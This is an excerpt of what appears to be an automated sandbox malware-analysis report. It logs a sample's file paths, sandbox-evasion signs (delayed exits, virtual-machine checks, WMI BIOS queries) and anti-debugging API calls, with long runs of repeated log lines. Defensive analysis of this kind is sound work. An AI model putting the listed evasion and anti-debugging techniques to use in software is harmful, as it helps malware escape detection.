                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466F7E2 Sleep,ExitProcess,8_2_0466F7E2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040F7E2 Sleep,ExitProcess,17_2_0040F7E2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051304FD Sleep,ExitProcess,17_2_051304FD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0467A7D9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A7D9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0513B4F4
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 662Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9320Jump to behavior
                  Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                  Source: C:\Users\Public\alpha.pifAPI coverage: 7.7 %
                  Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 3.4 %
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1620Thread sleep time: -1986000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1620Thread sleep time: -27960000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\SysWOW64\esentutl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\SysWOW64\esentutl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\esentutl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02885908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02885908
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,5_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,5_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,5_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,5_2_00B0532E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046696A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_046696A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0466928E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0467C322
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0466C388
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0466BD72
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667877 FindFirstFileW,FindNextFileW,8_2_04667877
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04668847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_04668847
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04679B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_04679B86
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,10_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,10_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,10_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,10_2_00B0532E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05128592 FindFirstFileW,FindNextFileW,17_2_05128592
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512A3BB __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0512A3BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512C886 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0512C886
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513A8A1 FindFirstFileW,17_2_0513A8A1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512CA8D FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0512CA8D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129562 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_05129562
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513D03D FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0513D03D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512D0A3 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0512D0A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129FA9 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_05129FA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_04667CD2
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.000000000075B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
                  Source: xpha.pif, 0000000B.00000002.1870785987.000000000343B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: colorcpl.exe, 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                  Source: Bzaszylr.PIF, 00000014.00000002.1986625678.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                  Source: Bzaszylr.PIF, 00000010.00000002.1911607370.00000000007AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeAPI call chain: ExitProcess graph end nodegraph_0-33210
                  Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_8-95025
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0289F744
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B22E37 IsDebuggerPresent,5_2_00B22E37
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0289894C
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B2C1FA mov eax, dword ptr fs:[00000030h]5_2_00B2C1FA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046A3355 mov eax, dword ptr fs:[00000030h]8_2_046A3355
